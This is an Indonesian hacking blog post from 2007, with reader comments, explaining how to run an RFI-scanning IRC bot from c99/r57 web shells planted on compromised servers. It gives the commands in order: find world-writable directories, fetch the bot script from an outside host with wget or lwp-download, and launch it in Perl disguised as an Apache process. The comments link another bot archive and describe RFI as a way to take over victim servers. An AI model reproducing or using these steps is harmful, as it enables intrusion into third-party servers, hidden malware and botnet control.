Cara Membuat Bot Scan RFI di mIRC
Ditulis oleh LeNK di/pada 26 Agustus, 2007
Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection blog saya ini. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.
ok.. kita mulai.
- Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
- Masuk ke shell anda
- cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
- jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
- wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
- jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
- kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
- Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
- Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
- Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
- Silahkan dipergunakan sebaik mungkin
Ket :
- Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
- Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
- Semua command di atas tanpa tanda petik dua (”)
Semoga membantu…
Credit to : dr.pluto
Editing sedikit :
banyak rekan yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut
- Shell lambat
- Script yang tidak mau jalan di shell
sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..
Dan untuk selanjutnya, mungkin akan saya buat artikel mengenai bot scan yang lainnya. jadi harap ditunggu.. 
rusty berkata
Wah…
bener bisa ga yah?? ini seh yang gue cari.. gue test dulu ya
Orang berkata
gak bisa ada errornya coba deh di cek lagi scriptnya baris 220
Reply from LeNK :
terimakasih udah di beritahukan. script sudah diganti dan silahkan di donlot kembali.
Orang berkata
setelah dijalankan tidak bekerja, saya coba jalankan perintah ke botnya !cmdx @help tapi diem aja
Orang berkata
ada script scanner google gak?
Reply from LeNK:
ada… nanti saya buatan article yang baru.. harap ditunggu
Fluzy berkata
saya ingin tanya nih botscannya saat saya masukan ke channel kok gak bisa di @help dan !cmdx kira² kesalahannya di mana nih, dan satu lagi jika mau matikan bot gimana cara atau perintahnya thank’s
Reply from LeNK:
pake command !cmdx @help di channel bro… kalo mau matiin !cdmx @die.. itu udah ada kok di list helpnya
Irfan-Gunadarma berkata
saya mau belajar tentang ini, tp saya masih belum paham, bagaimana menggabungkan command linux di windows atau memang kita chatnya lewat linux? setau saya mereka yang menggunakan shell tetap memakai windows untuk chat di mirc. Untuk shell ini harus mempunyai domain dan hosting sendiri yha? Tolong penjelasan detailnya
Blog nya bagus tuk pembelajaran, terima kasih
Reply from LeNK :
Begini bro.. yang saya maksud disini adalah shell c99 atau r57. Nah shell itu menggunakan bahasa php. jadi kita melakukan injeksi ke lubang sebuah web dengan menggunakan bahasa php itu. jika berhasil, maka bahasa php itulah yang berfungsi untuk membuat suatu tampilan di monitor kita. namun dalam melakukan aksi, tetap menggunakan bahasa UNIX.
Fluzy berkata
ada source bot RFI baru gak klo ada minta dong
odod berkata
script bot scannya gk ada lg ya?
ada yg baru gk? yg lbh tokcer gtu…
Good Luck…
Reply from LeNK :
tunggu ya bro.. ada kok..
i_am berkata
buz,,,!!
X-Friends berkata
OM tutornya aq posting di webku ya??? ga papa kan??
dah aq isi ” taken from” nya kok.
thanks atas Ilmu nya!!!
pingin_tau berkata
saya mau tanya ni um…….
compi saya mengunakan program windows ………
bukan mengunakan linux….
nach yang saya ingin tanya kan bisa kah saya bisa buat bot scan dengan mengunakan programe………..?
tolong bimbingannya……..
thank you
sh1nch1 berkata
Aloww Om.. Info terbaru ada gk tentang bot tuh.
thx sebelumnya
-Sh1nch1-
Didik berkata
mumet aku!!!!
apa itu “wget”?
apa itu “shell”.
Buka shell kamu! Shell yg mana????
komet bro… bantu buat mulai komputer hidup dong…
pertama buka windows,trus buka apa? trus buka apa?
Dari awal dong bang biar tau.saya orang gabTex nich…
Thx ya..
gak dikenal berkata
format txt yang mana
beb oe kagak teu
huehuee
tolong kasi penjelasan yg detail
thx sblumnya.. buat abg ne!!
hehe
gak dikenal berkata
sry bang nm emailnya salah
neh sya kasi yg bnr
trz sm web ny jg
Dhika berkata
format txt yang mana
beb oe kagak teu
huehuee
tolong kasi penjelasan yg detail
thx sblumnya.. buat abg ne!!
hehe
re4n berkata
http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
kog bisa ya bro….???
Reply from LeNK :
sepertinya link udah mati. tunggu bro, akan saya usahakan untuk diupdate lagi.
karena script terakhir yang saya miliki, sudah tidak jalan lagi di IRC
jiwa gila berkata
wah elo tu mah dah lama…..
ada yang lebih canggih lagi tuh
http://www.geocities.com/kelelawar_kecil/kopler.tar.gz
Reply from LeNK :
waw.. setelah saya liat, file tclnya di jadikan satu ya?
jadi sebuah bot bisa multifungsi? mantap..
tapi masih bisa ga neh?
RaNDi berkata
Gimana cara nya supaya bisa ngeposting script tuh ke geocities???
maklum masih cupu…
udah banyak script yang saya punya tapi saya ngak bisa ngeposting nyah!!!
tuma berkata
RFI itu apa sih mas? Jadi untuk menggunakan script ini kita harus install LAMP ya? Apakah jg harus punya akun shell? Bisa ga dijalanin di xchat soalnya saya pake ubuntu? Makasih sblmnya
Reply from LeNK :
RFI itu kependekan dari Remote File Inclusion. Mungkin kasarnya seh sebagai sebuah teknik mengambil alih komputer korban yang mempunyai sebuah lubang alias bug atau vulneralbility pada webnya. Jadi komputer yang dimaksud biasanya sebuah server.
kalo setahu saya seh ga perlu pake LAMP. Xchat saya belum pernah pake neh… tapi kayaknya bisa seh
Cavuera berkata
waduh wa pening lihat tcl nya… trus wa mo instal tuh bot di mIRC tapi gimana tentukan alamat server yang dituju???
trus untuk yang bagian gua bingung nick owner itu apa???
makasih
Reply from LeNK :
tergantung tcl botnya mas.. kalo pake punyanya pluto, musti ikuti petunjukknya.
tapi kalo pake bot scan lainnya, biasanya musti rubah tcl. simple kok.. tinggal ganti server. nick owner ya nick mas sendiri. masak mau buat bot untuk orang lain :p
vicko berkata
kog scriptnya ga ada lagi?
mikail berkata
bisa kasih ionfo gak bos cara bikin/TCL bot yg bisa proses secara otomatis,,hasil injekan yg langsung digabung ama path,,thanks